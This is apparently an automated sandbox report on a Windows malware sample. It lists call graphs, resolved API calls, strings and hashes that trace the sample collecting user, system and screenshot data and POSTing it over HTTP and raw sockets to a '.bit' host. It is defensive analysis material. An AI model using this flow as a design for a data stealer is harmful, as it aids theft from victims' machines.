4186fa 26917->26918 26919 40357c 7 API calls 26918->26919 26920 41870b 26919->26920 26921 4039e8 7 API calls 26920->26921 26922 418713 GetModuleHandleA 26921->26922 26923 41872f 26922->26923 26924 41871f 26922->26924 26926 418733 26923->26926 26927 41874f 26923->26927 26925 4039e8 7 API calls 26924->26925 26929 418727 LoadLibraryA 26925->26929 26930 4039e8 7 API calls 26926->26930 26928 4039e8 7 API calls 26927->26928 26931 418757 GetProcAddress 26928->26931 26929->26923 26932 41873b 26930->26932 26933 4039e8 7 API calls 26931->26933 26934 4039e8 7 API calls 26932->26934 26936 41876c GetProcAddress 26933->26936 26935 418747 LoadLibraryA 26934->26935 26935->26927 26937 4039e8 7 API calls 26936->26937 26938 418781 GetProcAddress 26937->26938 26939 4039e8 7 API calls 26938->26939 26940 418796 GetProcAddress 26939->26940 26941 4039e8 7 API calls 26940->26941 26942 4187ab GetProcAddress 26941->26942 26943 4039e8 7 API calls 26942->26943 26944 4187c0 GetProcAddress 26943->26944 26945 4039e8 7 API calls 26944->26945 26946 4187d5 GetProcAddress 26945->26946 26947 4039e8 7 API calls 26946->26947 26948 4187e9 GetProcAddress 26947->26948 26949 4039e8 7 API calls 26948->26949 26950 418800 GetProcAddress 26949->26950 26951 41881c 26950->26951 26952 4188f2 InternetCrackUrlA 26951->26952 26953 418901 26952->26953 27134 4039f0 26953->27134 26955 418977 InternetOpenA 26957 418991 InternetConnectA 26955->26957 26967 418ad6 26955->26967 26956 418922 26956->26955 26958 4037dc 7 API calls 26956->26958 26957->26967 26972 4189d4 26957->26972 26960 41895b 26958->26960 26959 418b28 26962 403538 7 API calls 26959->26962 27210 417f6c 53 API calls 26960->27210 26965 418b33 26962->26965 26964 418969 26964->26955 26966 4034e4 7 API calls 26965->26966 26968 418b3b 26966->26968 26967->26959 27146 418124 26967->27146 26970 403508 7 API calls 26968->26970 26971 418b58 26970->26971 26973 403508 7 API calls 26971->26973 26974 418a1c HttpOpenRequestA 26972->26974 26975 418b65 26973->26975 26977 418ad0 InternetCloseHandle 26974->26977 26981 418a31 26974->26981 26976 403508 7 API calls 26975->26976 26978 418b72 26976->26978 26977->26967 26979 403508 7 API calls 26978->26979 26980 418b7f 26979->26980 26980->26569 26982 418a66 HttpSendRequestA 26981->26982 26982->26977 26985 418a79 26982->26985 26983 418a89 InternetReadFile 27141 4035d4 26983->27141 26985->26977 26985->26983 26986 403798 7 API calls 26985->26986 26986->26985 26987->26545 26988->26581 26989->26585 26990->26589 26991->26594 26992->26598 26993->26602 26994->26606 26995->26609 26996->26736 26997->26736 26998->26736 26999->26736 27000->26736 27001->26736 27002->26736 27003->26736 27004->26736 27005->26736 27006->26736 27007->26736 27008->26736 27009->26736 27010->26736 27011->26736 27012->26623 27014 403861 27013->27014 27015 403887 27014->27015 27016 40389e 27014->27016 27235 403ac0 7 API calls 27015->27235 27018 4035a8 7 API calls 27016->27018 27019 403894 27018->27019 27020 4038cf 27019->27020 27021 403538 7 API calls 27019->27021 27021->27020 27023 403b9e 27022->27023 27024 403ba4 SysFreeString 27023->27024 27025 403bb6 27023->27025 27024->27023 27025->26541 27028 40350e 27026->27028 27027 403534 27030 403b80 27027->27030 27028->27027 27236 402550 7 API calls 27028->27236 27031 403b94 27030->27031 27032 403b86 SysFreeString 27030->27032 27031->26561 27032->27031 27033->26669 27034->26783 27035->26787 27037 40354c 27036->27037 27038 40353c 27036->27038 27039 40357a 27037->27039 27056 402550 7 API calls 27037->27056 27038->27037 27051 4035a8 27038->27051 27042 407b78 27039->27042 27044 407bb7 FreeSid 27042->27044 27044->26795 27046 407c9e 27045->27046 27047 407ca4 LookupAccountSidA CheckTokenMembership 27046->27047 27048 407d1d 27046->27048 27049 407cf2 FreeSid 27047->27049 27048->26807 27049->26807 27052 4035d0 27051->27052 27053 4035ac 27051->27053 27052->27037 27057 402530 7 API calls 27053->27057 27055 4035b9 27055->27037 27056->27039 27057->27055 27059 403b80 SysFreeString 27058->27059 27060 406e7f 27059->27060 27078 406dac 27060->27078 27106 407500 27063->27106 27067 406601 27066->27067 27068 4065ef 27066->27068 27070 4065ff 27067->27070 27071 403b80 SysFreeString 27067->27071 27069 403d10 4 API calls 27068->27069 27069->27070 27070->26827 27071->27070 27072->26829 27073->26831 27074->26833 27075->26835 27076->26837 27077->26841 27079 406dc6 27078->27079 27080 4040f4 SysAllocStringLen 27078->27080 27090 4040f4 27079->27090 27080->27079 27082 406dce 27083 406dff RegOpenKeyExW 27082->27083 27094 403d3c 27083->27094 27087 406e44 27088 403b98 SysFreeString 27087->27088 27089 406e5e 27088->27089 27089->26817 27091 4040fa SysAllocStringLen 27090->27091 27093 404110 27090->27093 27092 403b50 27091->27092 27091->27093 27092->27090 27093->27082 27095 403d40 RegQueryValueExW 27094->27095 27096 403d10 27095->27096 27097 403c74 27096->27097 27098 403b80 27097->27098 27099 403c7c SysAllocStringLen 27097->27099 27102 403b94 27098->27102 27103 403b86 SysFreeString 27098->27103 27100 403b50 27099->27100 27101 403c8c SysFreeString 27099->27101 27104 404110 27100->27104 27105 4040fa SysAllocStringLen 27100->27105 27101->27087 27102->27087 27103->27102 27104->27087 27105->27100 27105->27104 27107 4040f4 SysAllocStringLen 27106->27107 27108 40751a 27107->27108 27109 4040f4 SysAllocStringLen 27108->27109 27110 407522 27109->27110 27111 407579 RegOpenKeyExW 27110->27111 27112 407546 27110->27112 27111->27112 27113 40759d RegQueryValueExW 27112->27113 27114 403d10 4 API calls 27113->27114 27115 4075be 27114->27115 27116 403b98 SysFreeString 27115->27116 27117 406bce 27116->27117 27117->26821 27118->26853 27119->26858 27120->26858 27121->26868 27122->26877 27123->26877 27124->26886 27125->26903 27126->26903 27128 40399c 27127->27128 27129 4039d7 27128->27129 27130 4035a8 7 API calls 27128->27130 27129->26909 27131 4039b3 27130->27131 27131->27129 27133 402550 7 API calls 27131->27133 27133->27129 27135 403a22 27134->27135 27136 4039f5 27134->27136 27137 4034e4 7 API calls 27135->27137 27136->27135 27138 403a09 27136->27138 27140 403a18 27137->27140 27139 4035d4 7 API calls 27138->27139 27139->27140 27140->26956 27142 4035a8 7 API calls 27141->27142 27143 4035e4 27142->27143 27144 4034e4 7 API calls 27143->27144 27145 4035fc 27144->27145 27145->26985 27147 41816c 27146->27147 27148 40357c 7 API calls 27147->27148 27149 4181a7 27148->27149 27150 4039e8 7 API calls 27149->27150 27151 4181af GetModuleHandleA 27150->27151 27152 4181cb 27151->27152 27153 4181bb 27151->27153 27155 4039e8 7 API calls 27152->27155 27154 4039e8 7 API calls 27153->27154 27156 4181c3 LoadLibraryA 27154->27156 27157 4181d3 GetProcAddress 27155->27157 27156->27152 27158 4039e8 7 API calls 27157->27158 27159 4181ea GetProcAddress 27158->27159 27160 4039e8 7 API calls 27159->27160 27161 418201 GetProcAddress 27160->27161 27162 4039e8 7 API calls 27161->27162 27163 418218 GetProcAddress 27162->27163 27164 4039e8 7 API calls 27163->27164 27165 41822f GetProcAddress 27164->27165 27166 4039e8 7 API calls 27165->27166 27167 418246 GetProcAddress 27166->27167 27168 4039e8 7 API calls 27167->27168 27169 41825d GetProcAddress 27168->27169 27170 4039e8 7 API calls 27169->27170 27171 418274 GetProcAddress 27170->27171 27172 4184e2 27171->27172 27180 41828b 27171->27180 27173 403b98 SysFreeString 27172->27173 27174 4184ff 27173->27174 27175 4034e4 7 API calls 27174->27175 27176 41850a 27175->27176 27177 403b98 SysFreeString 27176->27177 27178 41851a 27177->27178 27179 403508 7 API calls 27178->27179 27181 418527 27179->27181 27180->27172 27182 4034e4 7 API calls 27180->27182 27184 403508 7 API calls 27181->27184 27183 4182fb 27182->27183 27186 41830b WSAStartup 27183->27186 27185 418534 27184->27185 27185->26959 27186->27172 27187 41831a socket 27186->27187 27187->27172 27188 418331 27187->27188 27189 418342 gethostbyname 27188->27189 27189->27172 27190 418351 htons connect 27189->27190 27190->27172 27191 418388 27190->27191 27192 403850 7 API calls 27191->27192 27193 4183ce 27192->27193 27211 417d60 27193->27211 27195 4183f8 27217 403e1c 27195->27217 27197 418427 27198 4039e8 7 API calls 27197->27198 27199 418448 send 27198->27199 27200 4034e4 7 API calls 27199->27200 27202 418458 27200->27202 27201 4034e4 7 API calls 27201->27202 27202->27201 27203 4035d4 7 API calls 27202->27203 27204 403798 7 API calls 27202->27204 27205 4184a8 closesocket 27202->27205 27203->27202 27204->27202 27206 4184c0 27205->27206 27207 4039f0 7 API calls 27206->27207 27208 4184d7 27207->27208 27209 403538 7 API calls 27208->27209 27209->27172 27210->26964 27212 417d8f 27211->27212 27223 403bbc 27212->27223 27214 417da7 27215 403b80 SysFreeString 27214->27215 27216 417dbc 27215->27216 27216->27195 27218 403e24 27217->27218 27233 403b50 SysAllocStringLen SysAllocStringLen 27218->27233 27220 403e39 27234 403b70 SysFreeString 27220->27234 27222 403e5a 27224 403b80 27223->27224 27225 403bc4 27223->27225 27226 403b94 27224->27226 27227 403b86 SysFreeString 27224->27227 27225->27224 27228 403bcf SysReAllocStringLen 27225->27228 27226->27214 27227->27226 27229 403b50 27228->27229 27230 403bdf 27228->27230 27231 404110 27229->27231 27232 4040fa SysAllocStringLen 27229->27232 27230->27214 27231->27214 27232->27229 27232->27231 27233->27220 27234->27222 27235->27019 27236->27028 27237 417b1a 27238 417b29 20 API calls 27237->27238 27239 417c2d 27237->27239 27238->27239 27240 785374 TerminateProcess 27241 78537f GetPEB 27240->27241 27242 7853c6 27241->27242 27243 401f5c 27244 401f70 27243->27244 27245 401f79 27243->27245 27261 401870 RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 27244->27261 27248 401fa2 RtlEnterCriticalSection 27245->27248 27249 401fac 27245->27249 27254 401f81 27245->27254 27247 401f75 27247->27245 27247->27254 27248->27249 27249->27254 27255 401e68 27249->27255 27252 4020d7 27253 4020cd RtlLeaveCriticalSection 27253->27252 27258 401e78 27255->27258 27256 401ea4 27260 401ec8 27256->27260 27267 401c7c 27256->27267 27258->27256 27258->27260 27262 401ddc 27258->27262 27260->27252 27260->27253 27261->27247 27271 401630 27262->27271 27265 401df9 27265->27258 27268 401cd1 27267->27268 27269 401c9a 27267->27269 27268->27269 27297 401bcc 27268->27297 27269->27260 27274 40164c 27271->27274 27273 401656 27290 40151c VirtualAlloc 27273->27290 27274->27273 27277 4016a7 27274->27277 27280 4016b3 27274->27280 27282 401388 27274->27282 27291 401284 LocalAlloc 27274->27291 27292 401464 27277->27292 27278 401662 27278->27280 27280->27265 27281 401d50 9 API calls 27280->27281 27281->27265 27283 401397 VirtualAlloc 27282->27283 27285 4013c4 27283->27285 27286 4013e7 27283->27286 27296 40123c LocalAlloc 27285->27296 27286->27274 27288 4013d0 27288->27286 27289 4013d4 VirtualFree 27288->27289 27289->27286 27290->27278 27291->27274 27294 401493 27292->27294 27293 4014ec 27293->27280 27294->27293 27295 4014c0 VirtualFree 27294->27295 27295->27294 27296->27288 27299 401be2 27297->27299 27298 401c6a 27298->27269 27299->27298 27300 401c21 27299->27300 27301 401c0d 27299->27301 27303 4017e4 3 API calls 27300->27303 27310 4017e4 27301->27310 27304 401c1f 27303->27304 27304->27298 27320 401aa8 9 API calls 27304->27320 27306 401c45 27307 401c5f 27306->27307 27321 401afc 9 API calls 27306->27321 27322 4012f4 LocalAlloc 27307->27322 27311 40180a 27310->27311 27319 401863 27310->27319 27323 4015b0 27311->27323 27315 401827 27316 40183e 27315->27316 27317 401464 VirtualFree 27315->27317 27316->27319 27328 4012f4 LocalAlloc 27316->27328 27317->27316 27319->27304 27320->27306 27321->27307 27322->27298 27324 4015e7 27323->27324 27325 401627 27324->27325 27326 401601 VirtualFree 27324->27326 27327 401284 LocalAlloc 27325->27327 27326->27324 27327->27315 27328->27319 27329 40370c 27336 403640 27329->27336 27330 403662 27333 403695 27330->27333 27345 403604 WideCharToMultiByte 27330->27345 27331 403659 27332 4034e4 7 API calls 27331->27332 27334 403660 27332->27334 27346 403ac0 7 API calls 27333->27346 27336->27330 27336->27331 27338 403680 27338->27333 27340 403686 27338->27340 27339 4036a2 27347 403604 WideCharToMultiByte 27339->27347 27342 4035d4 7 API calls 27340->27342 27342->27334 27343 4036b0 27348 403ac0 7 API calls 27343->27348 27345->27338 27346->27339 27347->27343 27348->27334 27349 40955e 27350 409583 27349->27350 27351 409569 LoadLibraryA GetProcAddress 27349->27351 27351->27350

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
              • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
              • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
              • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
              • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
              • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
              • API String ID: 2574300362-2815069134
              • Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
              • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
              • Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
              • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD

              Control-flow Graph

              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
              • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
              • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
              • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
              • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
              • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
              • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
              • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
              • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
              • WSAStartup.WS2_32(00000000,?), ref: 0041830C
              • socket.WS2_32(00000002,00000001,00000000), ref: 00418320
              • gethostbyname.WS2_32(00000000), ref: 00418343
              • htons.WS2_32(00000000), ref: 00418363
              • connect.WS2_32(00000000,00000002,00000010), ref: 0041837A
              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0041844A
              • closesocket.WS2_32(00000000), ref: 004184A9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
              • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
              • API String ID: 4159890453-3355491746
              • Opcode ID: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
              • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
              • Opcode Fuzzy Hash: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
              • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 654 418688-41868c 655 418691-418696 654->655 655->655 656 418698-4186d8 call 403980 * 3 655->656 663 4186e7-41871d call 4034e4 call 40357c * 2 call 4039e8 GetModuleHandleA 656->663 664 4186da-4186e2 call 40357c 656->664 674 41872f-418731 663->674 675 41871f-41872d call 4039e8 LoadLibraryA 663->675 664->663 677 418733-41874d call 4039e8 * 2 LoadLibraryA 674->677 678 41874f-418934 call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 404f00 * 7 call 403790 call 403990 InternetCrackUrlA call 4036dc call 403790 call 4039f0 call 403a78 674->678 675->674 677->678 728 418977-41898b InternetOpenA 678->728 729 418936-418974 call 4036dc call 4037dc call 417f6c call 403990 678->729 730 418991-4189ce InternetConnectA 728->730 731 418adc-418ae3 728->731 729->728 747 4189d4-4189fb call 4036dc call 403a78 730->747 748 418ad6-418ad9 730->748 737 418ae5-418b23 call 4036dc * 2 call 418124 731->737 738 418b28-418b7f call 403538 call 4034e4 call 403508 * 4 731->738 737->738 762 418a04-418a2b call 403990 HttpOpenRequestA 747->762 763 4189fd 747->763 748->731 770 418a31-418a35 762->770 771 418ad0-418ad4 InternetCloseHandle 762->771 763->762 773 418a55-418a77 call 403790 call 403990 HttpSendRequestA 770->773 774 418a37-418a51 call 403790 call 403990 770->774 771->748 773->771 785 418a79-418aaf call 404f00 InternetReadFile call 4035d4 773->785 774->773 789 418ab4-418ac8 call 403798 785->789 789->771 792 418aca-418ace 789->792 792->771 792->785
              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
              • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
              • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
              • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
              • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
              • GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
              • GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
              • GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
              • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
              • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
              • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
              • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
              • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
              • InternetReadFile.WININET(00000000,?,00010064,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A9D
              • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackFileModuleReadSend
              • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
              • API String ID: 1919173369-2879170074
              • Opcode ID: d00b6bce0946ca1063592c19d8de3ae7113a67940ae5b28bc5aab163a8a72812
              • Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
              • Opcode Fuzzy Hash: d00b6bce0946ca1063592c19d8de3ae7113a67940ae5b28bc5aab163a8a72812
              • Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 793 785374-78537d TerminateProcess 794 78537f-7853c4 GetPEB 793->794 795 7853c6-7853cc 794->795 796 7853ce-7853de call 785789 795->796 797 7853e0-7853e2 795->797 796->797 802 7853e6-7853e8 796->802 797->795 799 7853e4 797->799 801 7853ea-7853ec 799->801 803 78548f-785492 801->803 802->801 804 7853f1-785427 802->804 805 785430-785442 call 785760 804->805 808 785429-78542c 805->808 809 785444-78548e 805->809 808->805 809->803
              APIs
              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0078537D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: ProcessTerminate
              • String ID: .$3$e$k$l$r
              • API String ID: 560597551-427081609
              • Opcode ID: 015984842d46d1622cf35f8f2bc086576ce56ee08c7bf0c21f0fc58584c07109
              • Instruction ID: 36a3a1d159784db5e80121e28a845806a3bcc82d0622a44abea3f6b3baec38b8
              • Opcode Fuzzy Hash: 015984842d46d1622cf35f8f2bc086576ce56ee08c7bf0c21f0fc58584c07109
              • Instruction Fuzzy Hash: 9201F731500614CFDB10EF48C884BADBBF5FB04778F240119D801B7580C3F4AA84CBA0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 895 78537f-7853c4 GetPEB 896 7853c6-7853cc 895->896 897 7853ce-7853de call 785789 896->897 898 7853e0-7853e2 896->898 897->898 903 7853e6-7853e8 897->903 898->896 900 7853e4 898->900 902 7853ea-7853ec 900->902 904 78548f-785492 902->904 903->902 905 7853f1-785427 903->905 906 785430-785442 call 785760 905->906 909 785429-78542c 906->909 910 785444-78548e 906->910 909->906 910->904
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: .$GetProcAddress$l
              • API String ID: 0-2021252165
              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
              • Instruction ID: bfde5c15a42227c88bae6f53a944d21ae76a80eb23da2905a5c37a7fae8f6e0d
              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
              • Instruction Fuzzy Hash: FD316CB6900619DFDB10DF99C884AADBBF9FF08368F64414AD801A7710D7B5EA44CFA4
              APIs
              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
              Memory Dump Source
              • Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd
              Yara matches
              Similarity
              • API ID: NameUser
              • String ID:
              • API String ID: 2645101109-0
              • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
              • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
              • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
              • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
              • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
              • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
              • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
              • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
              • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
              • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
              • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
              • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
              • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
              • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
              • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
              • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
              • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
              • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
              • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
              • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
              • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
              • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
              • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
